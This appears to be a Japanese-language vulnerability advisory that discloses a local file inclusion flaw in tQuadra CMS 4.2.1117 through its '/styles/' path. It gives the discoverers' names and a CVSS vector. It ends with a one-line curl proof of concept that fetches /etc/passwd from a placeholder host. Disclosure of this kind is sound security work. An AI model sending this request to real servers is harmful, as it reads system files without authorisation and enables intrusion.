
Stefano Andreatta & Jacopo Candido Augelli
tQuadra CMS 4.2.1117 に、ローカルファイルインクルージョン(LFI)の脆弱性が確認されました。この問題は、「/styles/」パスに存在し、ユーザーが入力した値を適切にサニタイズできていません。攻撃者は、細工されたGETリクエストを送信することで、基盤となるシステム上の任意のファイルを取得できます。
発見者: Stefano Andreatta & Jacopo Candido Augelli
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
